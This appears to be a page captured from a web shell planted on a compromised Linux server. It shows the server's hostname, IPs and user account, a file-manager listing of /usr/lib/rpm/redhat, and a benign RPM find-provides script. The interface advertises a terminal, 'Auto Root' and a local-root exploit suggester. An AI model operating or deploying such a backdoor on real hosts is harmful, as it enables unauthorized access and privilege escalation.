Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
rpm /
redhat /
Delete
Unzip
Name
Size
Permission
Date
Action
brp-fix-pyc-reproducibility
560
B
-rwxr-xr-x
2025-05-14 08:35
brp-ldconfig
417
B
-rwxr-xr-x
2025-05-14 08:35
brp-llvm-compile-lto-elf
1.88
KB
-rwxr-xr-x
2025-05-14 08:35
brp-mangle-shebangs
4.41
KB
-rwxr-xr-x
2025-05-14 08:35
brp-python-bytecompile
5.64
KB
-rwxr-xr-x
2025-05-14 08:35
brp-strip-lto
558
B
-rwxr-xr-x
2025-05-14 08:35
compileall2.py
21.59
KB
-rw-r--r--
2024-10-01 12:46
config.guess
42.91
KB
-rwxr-xr-x
2025-05-14 08:35
config.sub
35.46
KB
-rwxr-xr-x
2025-05-14 08:35
dist.sh
1.94
KB
-rwxr-xr-x
2025-05-14 08:35
find-provides
1.19
KB
-rwxr-xr-x
2025-05-14 08:35
find-requires
1013
B
-rwxr-xr-x
2025-05-14 08:35
gpgverify
3.54
KB
-rwxr-xr-x
2025-05-14 08:35
kmodtool
9.03
KB
-rwxr-xr-x
2023-09-27 01:14
macros
16.02
KB
-rw-r--r--
2025-05-14 08:35
redhat-annobin-cc1
89
B
-r--r--r--
2025-05-14 08:35
redhat-annobin-plugin-select.sh
6.05
KB
-rwxr-xr-x
2025-05-14 08:35
redhat-annobin-select-annobin-built-plugin
89
B
-r--r--r--
2025-05-14 08:35
redhat-annobin-select-gcc-built-plugin
93
B
-r--r--r--
2025-05-14 08:35
redhat-hardened-cc1
153
B
-r--r--r--
2025-05-14 08:35
redhat-hardened-clang.cfg
6
B
-r--r--r--
2025-05-14 08:35
redhat-hardened-ld
47
B
-r--r--r--
2025-05-14 08:35
rpmrc
5.52
KB
-rw-r--r--
2025-05-14 08:35
rpmsort
2.11
KB
-rwxr-xr-x
2023-09-27 01:14
Save
Rename
#!/usr/bin/bash # This script reads filenames from STDIN and outputs any relevant provides # information that needs to be included in the package. if [ "$1" ] then package_name="$1" fi filelist=`sed "s/['\"]/\\\&/g"` [ -x /usr/lib/rpm/rpmdeps -a -n "$filelist" ] && echo $filelist | tr '[:blank:]' \\n | /usr/lib/rpm/rpmdeps --provides # # --- any other extra find-provides scripts for i in /usr/lib/rpm/redhat/find-provides.d/*.prov do [ -x $i ] && (echo $filelist | tr '[:blank:]' \\n | $i | sort -u) done # # --- Kernel module imported symbols # # Since we don't (yet) get passed the name of the package being built, we # cheat a little here by looking first for a kernel, then for a kmod. # is_kmod=1 for f in $filelist; do if [ $(echo "$f" | sed -r -ne 's:^.*/lib/modules/(.*)/(.*)\.ko(\.gz|\.bz2|\.xz)?$:\2:p') ] then is_kernel=1; fi if [ $(echo "$f" | sed -r -ne 's:^.*/boot/(.*):\1:p') ] then unset is_kmod; fi done if [ ! "$is_kernel" ] || [ "$package_name" == "kernel" ] then unset is_kmod fi [ -x /usr/lib/rpm/redhat/find-provides.ksyms ] && [ "$is_kmod" ] && printf "%s\n" "${filelist[@]}" | /usr/lib/rpm/redhat/find-provides.ksyms exit 0